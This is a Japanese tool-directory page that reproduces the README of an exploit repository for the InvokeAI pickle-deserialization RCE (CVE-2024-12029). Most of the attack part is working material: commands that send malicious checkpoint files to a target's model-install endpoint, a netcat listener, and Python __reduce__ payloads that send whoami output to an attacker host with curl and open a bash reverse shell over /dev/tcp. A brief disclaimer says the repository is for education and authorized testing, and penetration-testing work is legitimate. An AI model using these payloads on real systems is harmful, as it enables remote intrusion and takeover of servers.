Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE — This repository contains alternative payload approaches for the InvokeAI RCE vulnerability (CVE-2024-12029) when SSH key injection fails. The payloads are designed to test if pickle deserialization is actually occurring and provide alternative access methods. | Kitploit
ツール/GitHubGitHub/lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access ToolPayload Development

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

This repository contains alternative payload approaches for the InvokeAI RCE vulnerability (CVE-2024-12029) when SSH key injection fails. The payloads are designed to test if pickle deserialization is actually occurring and provide alternative access methods.

リポジトリを見る
4ヶ月前未レビュー

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

代替アプローチ:リバースシェル&コールバックテスト

概要

このリポジトリには、InvokeAIのRCE脆弱性(CVE-2024-12029)に対して、SSHキーインジェクションが失敗した場合の代替ペイロードアプローチが含まれています。ペイロードは、pickle逆シリアル化が実際に行われているかどうかをテストし、代替アクセス方法を提供するように設計されています。

問題の説明

SSHキーインジェクションペイロードが正常に配信された(ステータス201)にもかかわらず、SSHアクセスに依然としてパスワードが必要な場合、次のいずれかを示しています。

  1. pickle逆シリアル化が行われていない
  2. コマンドがブロック/サンドボックス化されている
  3. 実行方法に互換性がない

解決策:代替ペイロード

📁 ペイロードファイル

リバースシェルペイロード

  • payload_reverse_bash.ckpt (89バイト) - Bashリバースシェル
  • payload_reverse_python.ckpt (267バイト) - Pythonリバースシェル
  • payload_reverse_nc.ckpt (70バイト) - Netcatリバースシェル

テスト&検証ペイロード

  • payload_callback_test.ckpt (115バイト) - 逆シリアル化を検証するHTTPコールバック
  • payload_test.ckpt (90バイト) - 簡易ファイル作成テスト
  • payload_alt_exec.ckpt (223バイト) - 代替実行方法

SSHペイロード(参考用)

  • payload_ssh_simple.ckpt (271バイト) - Linux互換のSSHキーインジェクション

🛠️ テストスクリプト

Kaliテストスクリプト

  • kali_reverse_test.py - 包括的なテストスイート

ペイロードジェネレーター

  • reverse_shell_payload.py - リバースシェルペイロードの生成

🚀 クイック使用方法

1. ペイロードサーバーの起動

root@kitploit:~
python web_server.py --port 8000

2. コールバックテスト(最初に推奨)

root@kitploit:~
# kali_reverse_test.pyをKaliにコピーして実行:
python3 kali_reverse_test.py
# オプション1を選択してコールバックをテスト

3. リバースシェルのテスト

root@kitploit:~
# Kaliでリスナーを起動:
nc -lvnp 4444

# リバースシェルペイロードを送信:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_reverse_bash.ckpt', 'inplace': 'true'}, json={})"

4. 簡易実行のテスト

root@kitploit:~
# 基本コマンド実行のテスト:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_test.ckpt', 'inplace': 'true'}, json={})"

# ファイル作成の確認:
ssh [email protected] 'cat /tmp/payload_test.txt'

📊 テスト結果の解釈

✅ コールバックテスト成功

  • 意味: pickle逆シリアル化が機能している
  • 次のステップ: リバースシェルまたは代替SSHペイロードを試す
  • 確認: HTTPコールバックのWebサーバーログ

✅ リバースシェル成功

  • 意味: コマンドが実行され、ネットワークアクセスが機能している
  • 結果: netcatリスナーを介した直接シェルアクセス
  • 次のステップ: リバースシェルを使用したさらなるエクスプロイト

✅ テストファイル作成

  • 意味: 基本コマンド実行が機能している
  • 次のステップ: 代替SSHインジェクション方法を試す
  • 確認: 対象マシンの/tmp/payload_test.txt

コールバックペイロード

root@kitploit:~
class CallbackTestPayload:
    def __reduce__(self):
        import os
        command = 'curl "http://192.168.45.168:8000/callback?success=1&user=$(whoami)"'
        return (os.system, (command,))

リバースシェルペイロード

root@kitploit:~
class ReverseShellPayload:
    def __reduce__(self):
        import os
        command = f'bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1"'
        return (os.system, (command,))

テストペイロード

root@kitploit:~
class TestPayload:
    def __reduce__(self):
        import os
        return (os.system, ('echo "PAYLOAD_EXECUTED_$(date)" > /tmp/payload_test.txt',))

📚 参考文献

  • CVE-2024-12029: InvokeAI リモートコード実行
  • PyTorch 安全でない逆シリアル化: torch.load() の脆弱性
  • Pickle reduce: Pythonオブジェクトのシリアル化を利用したエクスプロイト

⚠️ 免責事項

このリポジトリは教育目的および許可されたセキュリティテスト目的でのみ使用されます。ユーザーは、システムをテストする前に適切な許可を得ていることを確認する責任を負います。

ツールをダウンロード